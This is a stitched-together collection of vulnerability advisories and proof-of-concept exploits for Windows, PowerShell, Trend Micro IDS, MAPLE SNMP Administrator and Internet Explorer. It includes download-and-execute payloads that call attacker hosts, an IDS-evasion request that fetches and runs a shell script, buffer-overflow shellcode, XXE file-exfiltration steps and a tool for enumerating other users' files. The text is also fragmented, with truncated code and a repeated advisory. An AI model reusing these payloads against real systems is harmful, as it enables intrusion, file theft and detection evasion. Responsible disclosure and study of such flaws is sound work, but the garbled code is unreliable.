print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt  -x .rar"
print "-u victim -z -s -f list_of_files.txt"

def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific 
directory to search .")
parser.add_argument("-a", "--artifact", help="Single artifact we want to 
verify e

NtFileSins / Windows NTFS Privileged File Access Enumeration Tool

[apparitionsec]

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2
# Added: Check for Zone.Identifer:$DATA to see if any identified files were 
downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access 
Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by 
another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe 
shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
#   2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an 
internal or external command,
# operable program or batch file" = Admin to Admin so this script is not 
required.
#
# Profile other users by compare ntfs error messages to potentially learn their 
activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with 
user-only rights.
#
#=#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.   #
# By John Page (aka hyp3rlinx)#
# Apparition Security #
#=#

BANNER='''
_   ___ ___ _   
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_//  v2  
   
 By hyp3rlinx
 ApparitionSec  
   
'''  

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My 
Documents","Searches","Videos/Captures",
   
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = 
set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
 ".bat",
  
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
print "NtFileSins is a privileged file access enumeration tool to search 
multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a ""'
print "-u victim -d Downloads -a  -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d -z Desktop/MyFiles -a  <.name>"
print "-u victim -d Searches -a .search-ms"
print "-u victim -d . -a "
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt  -x .rar"
print "-u victim -z -s -f list_of_files.txt"

def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific 
directory to search .")
parser.add_argument("-a", "--artifact", help="Single artifact we want to 
verify exists.")
parser.add_argument("-t", "--appdata", nargs="?", 

Microsoft Windows PowerShell Unsanitized Filename Command Execution

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security  
 

[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for 
system administrators.
PowerShell includes an interactive prompt and a scripting environment that can 
be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named 
scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the 
filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without 
the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be one 
of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute 
"hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the 
vulnerably named script.

However, when such scripts are run from PowerShells shell and not "cmd.exe" the 
"&" (call operator) will block our exploit from working.

Still, if the has user enabled ".ps1" scripts to open with PowerShell as its 
default program, all it takes is double click the file to trigger 
the exploit and the "& call operator" will no longer save you. Also, if the 
user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell 
"\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable save it to the victims machine and 
then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the vicitm 
has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.

C:\>powershell 
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell 
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows 
unexpected code execution; even when the scripts contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that may 
look at the contents or header of a file but not its filename where are
commands can be stored.

For this to work the user must have enabled PowerShell as its default program 
when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will download 
and execute a remote executable named in this case "n.exe".
c:\>powershell 
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell 
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal begining name, then separate commands using ";" 
semicolon e.g.

Test;powershell -e ;2.ps1

Create the executable without a file extension to save space for the filename 
then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80 or 
whatever.
Double click to open in PowerShell watch the file get downloaded saved and 
executed!

My example is used as a "filename embedded downloader", but obviously we can 
just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script 
is dangerous... but hey we looked at the file content and it simply printed a 
string!


[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute 
malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#


def parse_args():
parser.add_argument("-i", "--ipaddress", help="Remote server to download 
and exec malware from.")
parser.add_argument("-m", "--local_malware_name", help="Name for the 
Malware after downloading.")
parser.add_argument("-r", "--remote_malware_name", help="Malwares name on 
remote server.")
return parser.parse_args()

def main(args):
PSEmbedFilenameMalwr=""
if args.ipaddress:
PSEmbedFilenameMalwr = "powershell iwr 
"+args.ipaddress+"/"+args.remote_malware_name+" -O 
%CD%\\"+args.local_malware_name+" ;sleep -s 2;start 

Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security 
 

[Vendor]
www.trendmicro.com


[Product]
Deep Discovery Inspector

Deep Discovery Inspector is a network appliance that monitors all ports and 
over 105 different network protocols to discover advanced threats and targeted 
attacks
moving in and out of the network and laterally across it. The appliance detects 
and analyzes malware, command-and-control (C) communications, and evasive 
attacker
activities that are invisible to standard security defenses.



[Vulnerability Type]
Percent Encoding IDS Bypass


[CVE Reference]
Vendor decided not to release a CVE


[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for 
malicious system commands like "Wget Commandline Injection" and they will be 
flagged as high.
Attacker payloads sent with normal ascii characters for example like "wget" or 
even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get 
flagged and alerted on.

However, attackers can easily bypass these alerts by sending malicious commands 
in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also 
translates to "wget" and
will not get flagged or alerted on and may still be processed on the target 
system.

e.g.

DDI RULE 2452 
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452

Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is 
still run by the vulnerable target if the payload is encoded using percent/hex 
encoding like %77%67%65%74.
That will not only bypass the IDE by having no alert triggered or notification 
sent but the application will still process the malicious command.

Importantly, the "wget" DDI Rule 2452 used is just an example and can 
potentially be any malicious request where the IDS checks the character 
encodings but fails to account for
percent encoded HEX character payload values. 


[Exploit/POC]
from socket import *
#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass

IP = raw_input("[+] Trend Micro IDS")
PORT = 80

payload="/index.php?s=/index/vulnerable/app/invoke=call_user_func_array[0]=system[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;
req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)
res=""

while True:
res = s.recv(512)
print res
if res=="\n" or "":
break

s.close()


#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets 
triggered.



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security
 

[Vendor]
www.computerlab.com


[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15

https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
SnmpSetup.195.15.EXE MD5 File Hash: a3913aae166c11ddd21dca437e78c3f4

The CLI Thin Client Manager is designed to provide remote management and 
control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network 
Communication Protocol).
Agents are built into the clients for remote management and configuration.


[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day


[CVE Reference]
CVE-2019-13577


[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated 
Remote Buffer Overflow via a long string to the CE Remote feature listening on 
Port 987.
This will overwrite data on the stack/registers and allow for control of the 
programs execution flow resulting in attacker supplied remote code execution.
Authentication is not required for this exploit.

This program seems to be packed using ASPack v2.12 and can be difficult to 
unpack because it uses self-modifying code.
When installing the vulnerable program if asks for a serial number just enter a 
value of "1" or something.
Upon launching the program if any errors occur try right click SnmpAdm.exe and 
run it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp 
directory, make OS system files viewable in explorer to see them.

e.g. 

C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

ASLR / SEH are all set to False which help to make exploitation more portable. 

CALL EBX
10008FB3   0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] 
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program 
Files (x86)\SnmpAdm\ipwSNMPv5.dll)

Stack dump:

EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII 
"AAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (05A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)



[Exploit/POC]
from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack(" 1:
print "[*] No args supplied see Help -h"
exit()
main(parse_args())





[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

[**Fixed Typo] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec  


[Vendor]
www.microsoft.com


[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, 
consisting of a collection of HTML pages, an index and other navigation tools.
The files are compressed and deployed in a binary format with the extension 
.CHM, for Compiled HTML. The format is often used for software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by 
Microsoft's HTML-based help program.


[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection


[CVE Reference]
N/A


[Security Issue]
CHM Files are usually created using Microsofts "HTML Help Workshop" program. 
However, I find a way to bypass using this program and create them easily by
simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help 
"hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks allowing 
remote attackers to steal and exfiltrate local system files.

Whats interesting about this one is we can create the file without using the 
"Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 
52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. 

While CHM is already considered a "dangerous" file type and other type of 
attacks have already been documented. I thought this was an interesting way to
create CHM files "Uncompiled" bypassing the default creation steps while 
stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.


[Exploit/POC]
1) python -m SimpleHTTPServer


2) "XXE.chm.chm"




Uncompiled CHM File XXE PoC





http://localhost:81/payload.dtd;>
%dtd;]>






3) "payload.dtd"  (hosted in python web-server dir port 81 above)


http://localhost:81?%file;'>">
%all;


Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker 
Server IP is set to localhost using port 81 for PoC.

Tested successfully Windows 7/10


[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec  


[Vendor]
www.microsoft.com


[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, 
consisting of a collection of HTML pages, an index and other navigation tools.
The files are compressed and deployed in a binary format with the extension 
.CHM, for Compiled HTML. The format is often used for software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by 
Microsoft's HTML-based help program.


[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection


[CVE Reference]
N/A


[Security Issue]
CHM Files are usually created using Microsofts "HTML Help Workshop" program. 
However, I find a way to bypass using this program and create them easily by
simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help 
"hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks allowing 
remote attackers to steal and exfiltrate local system files.

Whats interesting about this one is we can create the file without using the 
"Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 
52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. 

While CHM is already considered a "dangerous" file type and other type of 
attacks have already been documented. I thought this was an interesting way to
create CHM files "Uncompiled" bypassing the default creation steps while 
stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.


[Exploit/POC]
1) python -m SimpleHTTPServer


2) "XXE.chm.chm"




Uncompiled CHM File XXE PoC





http://localhost:81/payload.dtd;>
%dtd;]>






3) "payload.dtd"  (hosted in python web-server dir port 8000 above)


http://localhost:81?%file;'>">
%all;


Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker 
Server IP is set to localhost using port 81 for PoC.

Tested successfully Windows 7/10


[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Word (2016) Deceptive File Reference ZDI-CAN-7949

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Word 2016


[Vulnerability Type]
Deceptive File Reference


[References]
ZDI-CAN-7949


[Security Issue]
When a MS Word ".docx" File contains a hyperlink to another file, it will run 
the first file it finds in that directory with a
valid extension. But will present to the end user an extension-less file in its 
Security warning dialog box without showing the extension type.
If another "empty" file of the same name as the target executable exists but 
has no file extension. Because the extension is supressed it
makes the file seem harmless and the file can be masked to appear as just a 
folder etc.

This can potentially trick user into running unexpected code, but will only 
work when you have an additional file of same name with
NO extension on it.


[Exploit/POC]
1) Create a directory "PoC"

2) Create a folder in PoC directory named "Downloads Folder"

3) Create a .BAT file named "Downloads Folder.bat"

in the .BAT create some command like "start calc.exe"

4) Create an empty file named "Downloads Folder" with no file extension

5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads 
Folder/Downloads Folder"

Upon opening the link Word will give user an vague dialog box about asking if 
they want to open
the file. However, the prompt shows an apparent folder structure and no file 
extension .exe, .com etc
are visible or displayed to the end user.

Click the link to open what looks to be a folder then BOOM! the .BAT file runs 
instead.

Of course any exeuctable will do .EXE etc.


[Network Access]
Local


[Severity]
High


[POC Video URL]
https://www.youtube.com/watch?v=irxkV_qGG9Y


[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program : 2019-01-25

Case officially contracted to ZDI : 2019-02-06

Vendor Disclosure : 2019-02-15
submitted to the vendor as ZDI-CAN-7949.

ZDI Response : "We have synced with the vendor and they have resolved that this 
case
does not meet the bar for security servicing. Therefore we will proceed to 
close it on our end."

2019-06-14 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt
 
[+] ISR: ApparitionSec  
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell ISE

The Windows PowerShell Integrated Scripting Environment (ISE) is a host 
application for Windows PowerShell.
In the ISE, you can run commands and write, test, and debug scripts in a single 
Windows-based graphic user interface.


[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day


[References]
ZDI-CAN-8005


[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging 
specially crafted PowerShell scripts that contain
array brackets as part of the filename. This can result in ISE executing 
attacker supplied scripts pointed to by the filename
and not the "trusted" PS file currently loaded and being viewed by a user in 
the host application. This undermines the integrity of
PowerShell ISE allowing potential unexpected remote code execution.

In PowerShell brackets are used to access array elements.

PS C:\> $a=1..10
PS C:\> $a[4]
5

However, when brackets are used as part of the filename it can be used to 
hijack the currently loaded file in place of another malicious file.
That file must contain a single matching char value which is also found in our 
specially crafted filename.

Requirements are both files must reside in the same directory. Example, if a 
file named [HelloWorldTutoria1].ps1 resides alongside a
file named 1.ps1 it will create a script hijacking condition. Note, the last 
letter is a number "1" not a lowercase "L".

Other things I discovered playing with PS filenames is we can target scripts 
using a single alphabetic or numeric char and certain symbols.
PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load 
and execute ===> '.ps1 if debugged from the vuln ISE application.

These chars also get the job done:
"$" "_" "#" "^"  plus any single case insensitive letter a-z or numbers 0-9, 
[Hello_World].ps1 > _.ps1

[Hello].ps1 will execute this instead => h.ps1

Dashes "-" throw the following error: "The specified wildcard character pattern 
is not valid: [Hello-World].ps1" when pointing to
another PS file named -.ps1 and seems to treat it sort of like a meta-character.

[pw3d].ps1 <= expected to execute

3.ps1 <= actually executed

This exploits the trust between PowerShell ISE and the end user. So scripts 
debugged local or over a network share display "trusted" code
in ISE that is expected to run. However, when the user debugs the script a 
different script gets executed.
Interestingly, that second script does NOT get loaded into PowerShell ISE upon 
execution, so a user may not see anything amiss.

User interaction is required for a successful attack to occur and obviously 
running any unknown PowerShell script can be dangerous. 
Again, this exploit takes advantage of "trust" where users can see and read the 
code and will trust it as everything looks just fine and
yet ... still they get PWNED!.

Tested successfully on Win7/10

Long live user interaction! lol...


[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw


[Exploit/POC]
After opening PS files in ISE, set the execution policy so can test without 
issues.
set-executionpolicy unrestricted -force

PS scripts over Network shares may get 'RemoteSigned' security policy issue so 
run below cmd.

set-executionpolicy unrestricted -force process
Choose 'R' to run once.

Below Python script will create two .ps1 files to demonstrate the vulnerable 
condition.
Examine the code, what does it say? it reads... Write-output "Hello World!"... 
now Run it...

BAM! other PS script executes!.


#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec


fname1="[HelloWorldTutoria1].ps1"#Expected code to run is 'HelloWorld!'
fname2="1.ps1"   #Actual code executed is calc.exe for Poc
evil_code="start calc.exe"   #Edit to suit your needs.
c=0
payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'

def mk_ps_hijack_script():
global c
c+=1
f=open(globals()["fname"+str(c)],"wb")
f.write(globals()["payload"+str(c)])
f.close()
if c<2:
mk_ps_hijack_script()


if __name__=="__main__":
mk_ps_hijack_script()
print "PowerShell ISE Xploit 0day Files Created!"
print "Discovery by hyp3rlinx"
print "ZDI-CAN-8005"



[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
ZDI Case opened : 2019-02-06

[**UPDATED] Microsoft Internet Explorer v11 / XML External Entity Injection 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer v11
(latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft 
and included in the Microsoft Windows line of operating systems, starting in 
1995.


[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
N/A



[Security Issue]
Internet Explorer is vulnerable to XML External Entity attack if a user opens a 
specially crafted .MHT file locally.

This can allow remote attackers to potentially exfiltrate Local files and 
conduct remote reconnaissance on locally installed
Program version information. Example, a request for "c:\Python27\NEWS.txt" can 
return version information for that program.

Upon opening the malicious ".MHT" file locally it should launch Internet 
Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
and other interactions like right click "Print Preview" or "Print" commands on 
the web-page may also trigger the XXE vulnerability.

However, a simple call to the window.print() Javascript function should do the 
trick without requiring any user interaction with the webpage.
Importantly, if files are downloaded from the web in a compressed archive and 
opened using certain archive utilities MOTW may not work as advertised.

Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users 
will get a security warning bar in IE and be prompted
to activate blocked content. However, when opening a specially crafted .MHT 
file using malicious  markup tags the user will get no such
active content or security bar warnings.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET 
/?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
 HTTP/1.1" 200 -


Tested successfully in latest Internet Explorer Browser v11 with latest 
security patches on Win7/10 and Server 2012 R2.



[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY



[Exploit/POC]
POC to exfil  Windows "system.ini" file.
Note: Edit attacker server IP in the script to suit your needs.

1) Use below script to create the "datatears.xml" XML and XXE embedded 
"msie-xxe-0day.mht" MHT file.

2) python -m SimpleHTTPServer

3) Place the generated "datatears.xml" in Python server web-root.

